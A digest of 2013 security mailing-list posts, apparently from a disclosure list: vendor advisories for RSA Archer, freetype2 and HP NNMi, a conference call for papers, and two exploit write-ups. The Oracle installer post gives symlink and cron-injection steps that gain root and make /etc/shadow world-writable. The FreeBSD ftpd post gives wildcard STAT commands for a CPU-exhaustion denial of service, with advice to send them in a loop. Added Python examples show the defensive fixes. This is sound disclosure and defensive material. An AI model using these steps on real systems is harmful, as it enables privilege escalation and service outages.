ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities

2013-02-04 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2013-002: RSA Archer® GRC Multiple Vulnerabilities


EMC Identifier: ESA-2013-002


CVE Identifier: CVE-2012-2293, CVE-2012-2292, CVE-2012-1064, CVE-2012-2294


Severity Rating:  See below for scores for individual issues

 

Affected Products:
 

RSA Archer SmartSuite Framework version 4.x

RSA Archer GRC version 5.x

 

Summary:  

The RSA Archer GRC 5.3 and 5.2SP1 platforms contain fixes for multiple security 
vulnerabilities that could potentially be exploited by malicious users to 
compromise the affected system.

 

Details:  

The vulnerabilities addressed in RSA Archer GRC 5.3 and RSA Archer GRC 5.2SP1 
are:

1. Path traversal vulnerability (CVE-2012-2293)
This vulnerability may allow malicious users to upload arbitrary files to a 
vulnerable RSA Archer system using relative paths.
CVSSv2 Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

2. Improper permissions in Silverlight cross-domain policy (CVE-2012-2292)
This vulnerability allows access to the RSA Archer application from any domain. 
This insecure permission may lead to cross-domain attacks.
CVSSv2 Base Score: 8.3 (AV:N/AC:M/Au:N/C:C/I:P/A:P)

3. Multiple cross-site scripting vulnerabilities (CVE-2012-1064)
These vulnerabilities can be exploited to execute arbitrary HTML and script 
code in an RSA Archer user's browser session in the context of an affected RSA 
Archer application.
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

4. Clickjacking vulnerability (CVE-2012-2294)
A malicious user may exploit this vulnerability by constructing a specially 
crafted Web page disguised as legitimate content to conduct clickjacking 
attacks. The user's clicks in the malicious page may perform unwanted actions.
CVSSv2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)


Resolution:

RSA strongly recommends all customers upgrade to RSA Archer GRC v5.3 or install 
5.2SP1 at their earliest opportunity.

• 5.3 installers are available through RSA SecurCare Online (SCOL) 
https://knowledge.rsasecurity.com
• 5.2SP1 installers are available from RSA Archer Customer Support.
• For additional information on fixes and steps to reduce risks, log on to 
https://knowledge.rsasecurity.com and select: Home » Products » RSA Archer eGRC 
Solutions » RSA Archer 5.3 ESA FAQ.


Credits: 

RSA would like to thank Nello Coppeto at eMaze Network SpA 
(http://blog.emaze.net) for reporting issues under CVE-2012-1064. 


Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, 
“Security Advisories Severity Rating” at 
https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA 
recommends all customers take into account both the base score and any relevant 
temporal and environmental scores which may impact the potential severity 
associated with a particular security vulnerability.


Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose documentation you want to obtain. 
Scroll to the section for the product version that you want and click the set 
link.



Obtaining More Information:

For more information about RSA SecurID, visit the RSA web site at 
http://www.rsa.com/node.aspx?id=1156.



Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA 
Customer Support center with any additional questions regarding this RSA 
SecurCare Note. For contact telephone numbers or e-mail addresses, log on to 
RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help > 
Contact, and then click the Contact Us - Phone tab or the Contact Us - Email 
tab.


General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264


RSA SecurCare Online:

https://knowledge.rsasecurity.com


EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575


SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in 
order to bring to the attention of users of the affected RSA products important 
security information. RSA recommends that all users determine the applicability 
of this information to their individual situations and take appropriate action. 
The information set forth herein is provided as is without warranty of any 
kind. RSA disclaims all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event shall RSA or its suppliers be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of 

[HITB-Announce] #HITB2013AMS FINAL CALL for Paper Submissions

2013-02-04 Thread Hafez Kamal

Hi everyone - This is the FINAL CALL for paper submissions for the 4th
annual HITB Security Conference in Amsterdam, #HITB2013AMS. We're
looking for talks that are highly technical, but most importantly,
material which is new and cutting edge.

Submissions are due BEFORE 8th Feb 23:59 CET

HITB CFP: http://cfp.hackinthebox.org/

---

#HITB2013AMS takes place at the Okura Hotel in Amsterdam from the 8th
till the 11th of April. We kick off as always with two-days of hands
on technical trainings (8th and 9th).

We then continue with a triple track conference with keynotes by Eddie
Schwartz, Chief Information Security Officer at RSA and Bob Lord,
Chief Security Officer at Twitter. The closing keynote will be
presented by Winn Schwartau.

Event Website: http://conference.hitb.org/

===

Each accepted submission will entitle the speaker(s) to
accommodation for 3 nights / 4 days and travel expense reimbursement
up to EUR1200.00 per speaking slot.

Topics of interest include, but are not limited to the following:

  Cloud Security
  File System Security
  3G/4G/WIMAX Security
  SS7/GSM/VoIP Security
  Security of Medical Devices
  Critical Infrastructure Security
  Smartphone / Mobile Security
  Smart Card and Physical Security
  Network Protocols, Analysis and Attacks
  Applications of Cryptographic Techniques
  Side Channel Analysis of Hardware Devices
  Analysis of Malicious Code / Viruses / Malware
  Data Recovery, Forensics and Incident Response
  Hardware based attacks and reverse engineering
  Windows / Linux / OS X / *NIX Security Vulnerabilities
  Next Generation Exploit and Exploit Mitigation Techniques
  NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security

Your submission will be reviewed by The HITB CFP Review Committee:

Charlie Miller (formerly Principal Research Consultant, Accuvant Labs)
Katie Moussouris, Senior Security Strategist, Microsoft
Itzik Kotler, Chief Technology Officer, Security Art
Cesar Cerrudo, Chief Technology Officer, IOActive
Jeremiah Grossman, Founder, Whitehat Security
Andrew Cushman, Senior Director, Microsoft
Saumil Shah, Founder CEO Net-Square
Thanh 'RD' Nguyen, THC, VNSECURITY
Alexander Kornburst, Red Database
Fredric Raynal, QuarksLab
Shreeraj Shah, Founder, BlueInfy
Emmanuel Gadaix, Founder, TSTF
Andrea Barisani, Inverse Path
Philippe Langlois, TSTF
Ed Skoudis, InGuardians
Haroon Meer, Thinkst
Chris Evans, Google
Raoul Chiesa, TSTF/ISECOM
rsnake, SecTheory
Gal Diskin, Intel
Skyper, THC

Note: We do not accept product or vendor related pitches. If you would
like to showcase your company's products or technology, please email
conferencei...@hackinthebox.org

See you in Amsterdam!

---
Hafez Kamal,
HITB Conference Core Crew (.MY),
Hack in The Box (M) Sdn. Bhd.
36th Floor, Menara Maxis,
Kuala Lumpur City Centre,
50088 Kuala Lumpur,
Malaysia

Tel: +603-26157299
Fax: +603-26150088
PGP Key ID: 0xC0DC7DF8



Oracle Automated Service Manager 1.3 Auto Service Request 4.3 local root during install

2013-02-04 Thread larry0
Oracle Automated Service Manager 1.3 local root during install

Larry W. Cashdollar
1/29/2013
@_larry0


SUNWsasm-1.3.1-20110815093723

https://updates.oracle.com/Orion/Services/download?type=readmearu=15864534

From the README:
Oracle Automated Service Manager 1.3.1

Oracle Automated Service Manager is the service management container for Auto 
Service Request and Secure File Transport. It provides platform services (such 
as logging, data transport and persistence) to business services that are 
deployed to it.

Possible issues with files in /tmp.

root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp

##Read the contents of crontab into a tmp file
/usr/bin/crontab -l > /tmp/crontab_edit
echo 0 > /tmp/tmpVariable
grep /opt/SUNWswasr/bin/update_rules.sh /tmp/crontab_edit |
echo 1 > /tmp/tmpVariable
grep 0 /tmp/tmpVariable > /dev/null
echo >> /tmp/crontab_edit
echo "##Cronjob entry for ASR Auto Rules Update" >> /tmp/crontab_edit
echo "$min $hour * * * /opt/SUNWswasr/bin/update_rules.sh" >> /tmp/crontab_edit
ASR_STAT_REP=`/bin/grep -c 'bin/asr report' /tmp/crontab_edit`
sed "/asr report/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
sed "/ASR Status Report/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
ASR_HEARTBEAT=`/bin/grep -c 'bin/asr heartbeat' /tmp/crontab_edit`
sed "/asr heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
sed "/ASR Heartbeat/d" /tmp/crontab_edit > /tmp/asrtab1.???
mv /tmp/asrtab1.??? /tmp/crontab_edit
/usr/bin/crontab /tmp/crontab_edit
## Finally remove the tmp file
rm -f /tmp/tmpVariable
rm -f /tmp/crontab_edit

tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%SOURCE'`
/usr/bin/crontab -l > /tmp/asrtab.??
UPDATE_RULES=`/bin/grep -c 'bin/update_rules.sh' /tmp/asrtab.??`
sed "/update_rules.sh/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Auto Rules/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
ASR_STAT_HB=`/bin/grep -c 'bin/asr' /tmp/asrtab.??`
sed "/asr report/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Status Report/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/asr heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
sed "/ASR Heartbeat/d" /tmp/asrtab.?? > /tmp/asrtab.???
mv /tmp/asrtab.??? /tmp/asrtab.??
/usr/bin/crontab /tmp/asrtab.??
rm /tmp/asrtab.??
]!tmpD
root@dev-unix-sec01:~/test#
First try, File overwriting vulnerability

$ ln -s /etc/shadow /tmp/mytab-tmp.??
$ ln -s /etc/shadow /tmp/mytab.??

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at 
https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ### [100%]

Authentication service cannot retrieve authentication info You (root) are not 
allowed to access to (/usr/bin/crontab) because of pam configuration.

Authentication service cannot retrieve authentication info You (root) are not 
allowed to access to (/usr/bin/crontab) because of pam configuration. 

[root@oracle-lnx-lab02 ~]# cat /etc/shadow
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

Ok, lets try to inject a cronjob and get root:

Malicious user does:

[meanie@oracle-lnx-lab02 ~]$ while (true) ;do echo "* * * * * /tmp/rootme" > /tmp/mytab.??; done

[root@oracle-lnx-lab02 ~]# rpm -Uvh SUNWsasm-1.3.1-20110815093723.rpm
Preparing...
### [100%]

Copyright 2008,2011 Oracle and/or its affiliates. All rights reserved.

License and Terms of Use for this software are described at 
https://support.oracle.com/ (see Terms o f Use)

1:SUNWsasm ## [100%]
[root@oracle-lnx-lab02 ~] crontab -l
* * * * * /tmp/rootme
0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1

/tmp/rootme is:

#!/bin/sh

chmod 666 /etc/shadow

after a minute:

[root@oracle-lnx-lab02 ~] ls -l /etc/shadow

-rw-rw-rw- 1 root root 744 Jan 30 21:02 /etc/shadow

[root@oracle-lnx-lab02 ~]

Faulty Code:

/usr/bin/crontab -l > /tmp/mytab.??
if [ $(/bin/grep -c 'sasm' /tmp/mytab.??) -eq 0 ];then
   echo "0,12,24,36,48 * * * * /opt/SUNWsasm/bin/sasm start-instance > /dev/null 2>&1" >> /tmp/mytab.??
   /usr/bin/crontab /tmp/mytab.??
fi

rm /tmp/mytab.??


SUNWswasr RPM post install /tmp race condition


From the documentation:

Auto Service Request (ASR) is a secure, scalable, customer-installable 
software feature of warranty and Oracle Support Services that provides 
auto-case generation when common hardware component faults occur. ASR is 
designed to enable faster problem resolution by eliminating the need to 
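
The race in both scripts comes from a fixed, guessable scratch name under /tmp that is opened for writing without any check of what is already sitting there. The Python below is an added example, not code from the advisory or from the Oracle packages: it replays the symlink-follow outcome inside a throwaway directory and sets it against two hardened patterns, an exclusive non-following open of a fixed name and mkstemp() for an unpredictable one. The directory, the stand-in target file and the crontab line are all constructed for the demonstration.

```python
import os
import tempfile

# Constructed stand-in for the crontab line the script appends; not the real entry.
CRON_LINE = "0 * * * * /opt/example/job\n"


def unsafe_write(path: str, data: str) -> None:
    """The post-install script's pattern: a fixed, guessable name under /tmp,
    opened for writing. open() follows whatever is already at that name, so a
    symlink planted there by another local user redirects the write."""
    with open(path, "w") as f:
        f.write(data)


def write_exclusive(path: str, data: str) -> None:
    """Hardened open of a name that must not pre-exist: O_EXCL fails if any
    entry (a dangling symlink included) is already there, O_NOFOLLOW refuses
    to traverse a symlink, and mode 0o600 keeps other users out."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def write_scratch(directory: str, prefix: str, data: str) -> str:
    """Preferred pattern (the shell equivalent is mktemp): mkstemp() picks an
    unpredictable name and creates it atomically with O_CREAT|O_EXCL, so
    nothing can be planted at it beforehand. Returns the path."""
    fd, path = tempfile.mkstemp(prefix=prefix, dir=directory)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo() -> dict:
    """Replays the race inside a throwaway directory: a symlink at the
    guessable name points at a stand-in for /etc/shadow."""
    base = tempfile.mkdtemp()
    target = os.path.join(base, "shadow")           # stand-in, not the real file
    with open(target, "w") as f:
        f.write("root:original\n")
    guessable = os.path.join(base, "mytab.??")      # the name the script always uses
    os.symlink(target, guessable)

    refused = False
    try:
        write_exclusive(guessable, CRON_LINE)       # must fail: something is there
    except FileExistsError:
        refused = True
    scratch = write_scratch(base, "mytab.", CRON_LINE)
    with open(target) as f:
        after_hardened = f.read()                   # untouched by either hardened write

    unsafe_write(guessable, CRON_LINE)              # follows the planted symlink
    with open(target) as f:
        after_unsafe = f.read()                     # target now holds CRON_LINE

    return {
        "exclusive_refused": refused,
        "scratch_is_fresh": scratch != guessable and not os.path.islink(scratch),
        "after_hardened": after_hardened,
        "after_unsafe": after_unsafe,
    }


if __name__ == "__main__":
    print(demo())
```

Running it shows the stand-in target keep its contents through both hardened writes and lose them to the original pattern. In a post-install script the same idea is `mktemp` (or a private `mktemp -d` directory) in place of `/tmp/name.??`, with `crontab` fed from that file; the exclusive open is the fallback when a fixed name cannot be avoided.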

FreeBSD 9.1 ftpd Remote Denial of Service

2013-02-04 Thread max
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...


--- 1. Description ---
I have decided to check BSD ftpd servers once again for wildcards. An old bug in libc 
(CVE-2011-0418) allows a denial of service of ftpd in the latest FreeBSD version. 
An attacker who can connect anonymously to the FTP server may cause CPU resource 
exhaustion. Logging in with 'USER anonymous' 'PASS anonymous' and sending a 'STAT' 
command with a special wildcard is enough to create an ftpd process with 100% CPU 
usage.

Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(void)
{
    glob_t globbuf;
    /* 64 brace groups: each doubles the number of patterns glob(3) expands */
    char stringa[] = "{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";

    glob(stringa, GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
    return 0;
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp 13034   0.0  0.4  10416   1944  ??  R10:48PM0:00.96 ftpd: 
cxsec.org anonymous/anonymous (ftpd)
ftp 13035   0.0  0.4  10416   1944  ??  R10:48PM0:00.89 ftpd: 
cxsec.org anonymous/anonymous (ftpd)
ftp 13036   0.0  0.4  10416   1944  ??  R10:48PM0:00.73 ftpd: 
cxsec.org anonymous/anonymous (ftpd)
ftp 13046   0.0  0.4  10416   1952  ??  R10:48PM0:00.41 ftpd: 
cxsec.org anonymous/anonymous (ftpd)
ftp 13047   0.0  0.4  10416   1960  ??  R10:48PM0:00.42 ftpd: 
cxsec.org anonymous/anonymous (ftpd)
..
root13219   0.0  0.3  10032   1424  ??  R10:52PM0:00.00 
/usr/libexec/ftpd -dDA
root13225   0.0  0.3  10032   1428  ??  R10:52PM0:00.00 
/usr/libexec/ftpd -dDA
root13409   0.0  0.3  10032   1404  ??  R10:53PM0:00.00 
/usr/libexec/ftpd -dDA
root13410   0.0  0.3  10032   1404  ??  R10:53PM0:00.00 
/usr/libexec/ftpd -dDA
..

=Sending:
STAT 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

=Result:
@ps:
ftp  1336 100.0  0.5  10416   2360  ??  R11:15PM 600:39.95 ftpd: 
127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root1 1030 10416K  2360K RUN600:53 100.00% ftpd

One request gives over 600m (~10h) of execution time at 100% CPU usage. This issue 
allows creating N ftpd processes with 100% CPU usage.

Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat 
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD have fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24r2=1.23.10.2

The funniest thing is that FreeBSD uses GLOB_LIMIT in the ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
	int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

	memset(&gl, 0, sizeof(gl));
	gl.gl_matchc = MAXGLOBARGS;
	flags |= GLOB_LIMIT;
	freeglob = 1;
	if (glob(whichf, flags, 0, &gl)) {
---

but GLOB_LIMIT in FreeBSD doesn't work. The glob(3) function allows CPU resource 
exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products. 
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

only FreeBSD and GNU glibc are affected


--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233


--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve problem 
with security ;)


--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http://cxsecurity.com/cveshow/CVE-2010-2632

Multiple FTPD Server 
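
The point of the post is that the cost of a STAT argument is set by brace expansion, which glob(3) performs before any matching, and which, as the post shows, a cap on the number of matches (GLOB_LIMIT with gl_matchc) did not stop. A server can bound it on the input side by counting the expansions without producing them. The Python below is an added example, not code from FreeBSD, NetBSD or cxsecurity; MAX_EXPANSIONS is an assumed value, and the counter goes beyond the flat patterns in the post by handling nested groups and unmatched braces (an unclosed brace, a stray comma and a group with no comma all count as one string).

```python
from typing import Optional, Tuple

# Assumed cap on the number of strings a pattern may expand to before it is
# handed to glob(3). Constructed for this example; it is not FreeBSD's
# MAXGLOBARGS, which caps matches rather than expansions.
MAX_EXPANSIONS = 1024


def _count_group(s: str, i: int) -> Tuple[int, Optional[int]]:
    """s[i] is '{'. Sums the expansion counts of the comma-separated
    alternatives up to the matching '}'. Returns (sum, index after '}'),
    or (0, None) when the brace is never closed."""
    alt_sum = 0
    j = i + 1
    while True:
        count, j = _count_seq(s, j)
        alt_sum += count
        if j < len(s) and s[j] == ",":
            j += 1                       # next alternative
        elif j < len(s) and s[j] == "}":
            return alt_sum, j + 1
        else:
            return 0, None               # ran off the end: unmatched '{'


def _count_seq(s: str, i: int) -> Tuple[int, int]:
    """Counts expansions of the run starting at s[i], stopping at a ',' or '}'
    that belongs to an enclosing group (or at the end). Groups multiply,
    because every alternative is combined with everything around it."""
    total = 1
    while i < len(s) and s[i] not in ",}":
        if s[i] == "{":
            alt_sum, after = _count_group(s, i)
            if after is None:
                i += 1                   # unmatched '{' is a literal character
                continue
            total *= alt_sum
            i = after
        else:
            i += 1
    return total, i


def brace_expansion_count(pattern: str) -> int:
    """Number of strings csh-style brace expansion yields for `pattern`,
    computed without materialising any of them."""
    total, i = _count_seq(pattern, 0)
    while i < len(pattern):              # stray top-level ',' or '}' is literal
        i += 1
        count, i = _count_seq(pattern, i)
        total *= count
    return total


def pattern_within_limit(pattern: str, limit: int = MAX_EXPANSIONS) -> bool:
    """Input-side check a server would run before calling glob(3)."""
    return brace_expansion_count(pattern) <= limit


if __name__ == "__main__":
    hostile = "{a,b}" * 48                      # the STAT argument from the post
    print(brace_expansion_count(hostile), pattern_within_limit(hostile))
```

The counter is linear in the pattern length because it never materialises an expansion; the 48-group argument from the post evaluates to 2^48 and is rejected, while an ordinary pattern such as `*.{c,h}` passes. FreeBSD's ftpd already inspects the argument with `strpbrk(whichf, "~{[*?")` before calling glob(), which is where such a check would sit.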

[ MDVSA-2013:006 ] freetype2

2013-02-04 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:006
 http://www.mandriva.com/security/
 ___

 Package : freetype2
 Date: February 1, 2013
 Affected: 2011., Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in freetype2:
 
 A Null pointer de-reference flaw was found in the way Freetype font
 rendering engine handled Glyph bitmap distribution format (BDF)
 fonts. A remote attacker could provide a specially-crafted BDF font
 file, which once processed in an application linked against FreeType
 would lead to that application crash (CVE-2012-5668).
 
 An out-of-bounds heap-based buffer read flaw was found in the way FreeType
 font rendering engine performed parsing of glyph information and
 relevant bitmaps for glyph bitmap distribution format (BDF). A remote
 attacker could provide a specially-crafted BDF font file, which once
 opened in an application linked against FreeType would lead to that
 application crash (CVE-2012-5669).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5668
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5669
 ___

 Updated Packages:

 Mandriva Linux 2011:
 2f3fec203494eb640bb48614b8cdbb27  
2011/i586/freetype2-demos-2.4.5-2.4-mdv2011.0.i586.rpm
 89091b1ba606e039e60303d358947fdc  
2011/i586/libfreetype6-2.4.5-2.4-mdv2011.0.i586.rpm
 6c2eae3f6588bc307b4ebb646c1a4c25  
2011/i586/libfreetype6-devel-2.4.5-2.4-mdv2011.0.i586.rpm
 bcbd756fd42addea3fd2a38a11567f7a  
2011/i586/libfreetype6-static-devel-2.4.5-2.4-mdv2011.0.i586.rpm 
 6c70cd4370fa8ed01c0285c46bba3597  2011/SRPMS/freetype2-2.4.5-2.4.src.rpm

 Mandriva Linux 2011/X86_64:
 abe907ac020e7a6a84d1e0eb86858aa1  
2011/x86_64/freetype2-demos-2.4.5-2.4-mdv2011.0.x86_64.rpm
 07c54a3f0face61f8cbb5983759ca9cb  
2011/x86_64/lib64freetype6-2.4.5-2.4-mdv2011.0.x86_64.rpm
 73ab4f6bf793c93a387eb7434c834900  
2011/x86_64/lib64freetype6-devel-2.4.5-2.4-mdv2011.0.x86_64.rpm
 41c33cc62c33163285ea2c0b1ce44532  
2011/x86_64/lib64freetype6-static-devel-2.4.5-2.4-mdv2011.0.x86_64.rpm 
 6c70cd4370fa8ed01c0285c46bba3597  2011/SRPMS/freetype2-2.4.5-2.4.src.rpm

 Mandriva Enterprise Server 5:
 505e61f7fc629cc51bce2777983da6ef  
mes5/i586/freetype2-demos-2.3.7-1.11mdvmes5.2.i586.rpm
 d6472b584d439b2149fa136995e0bd3e  
mes5/i586/libfreetype6-2.3.7-1.11mdvmes5.2.i586.rpm
 2cbc0e8ba2697ad6534c8a97b6776448  
mes5/i586/libfreetype6-devel-2.3.7-1.11mdvmes5.2.i586.rpm
 a678543b7e22d42a8c5f753c59e30087  
mes5/i586/libfreetype6-static-devel-2.3.7-1.11mdvmes5.2.i586.rpm 
 9af34144efab6305f17b8a2e296d91ce  
mes5/SRPMS/freetype2-2.3.7-1.11mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 34ff382889cc95c97f1c68e6c234fd4c  
mes5/x86_64/freetype2-demos-2.3.7-1.11mdvmes5.2.x86_64.rpm
 8d736d3cde5ca7348f6a4fff11016eda  
mes5/x86_64/lib64freetype6-2.3.7-1.11mdvmes5.2.x86_64.rpm
 abeb5fc6c8a8a36c50147500c412a6fd  
mes5/x86_64/lib64freetype6-devel-2.3.7-1.11mdvmes5.2.x86_64.rpm
 4da0078d481d44a06445586dcc9e0e90  
mes5/x86_64/lib64freetype6-static-devel-2.3.7-1.11mdvmes5.2.x86_64.rpm 
 9af34144efab6305f17b8a2e296d91ce  
mes5/SRPMS/freetype2-2.3.7-1.11mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFRC36EmqjQ0CJFipgRAubHAJ0delnQDUuB8LwdvUe6w2EVZCNUWACeLSV6
wQo28kQIhW9Iw2sw2XTidvc=
=io0/
-END PGP SIGNATURE-



[security bulletin] HPSBMU02842 SSRT100909 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

2013-02-04 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03652323
Version: 1

HPSBMU02842 SSRT100909 rev.1 - HP Network Node Manager i (NNMi) for HP-UX,
Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-01-31
Last Updated: 2013-01-31

Potential Security Impact: Remote cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network Node
Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerabilities
could be remotely exploited resulting in cross site scripting (XSS).

References: CVE-2012-3279

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Node Manager I (NNMi) v8.x, v9.0x, v9.1x, v9.20 for HP-UX, Linux,
Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference       Base Vector                    Base Score
  CVE-2012-3279   (AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made hotfixes available to resolve these vulnerabilities for NNMi
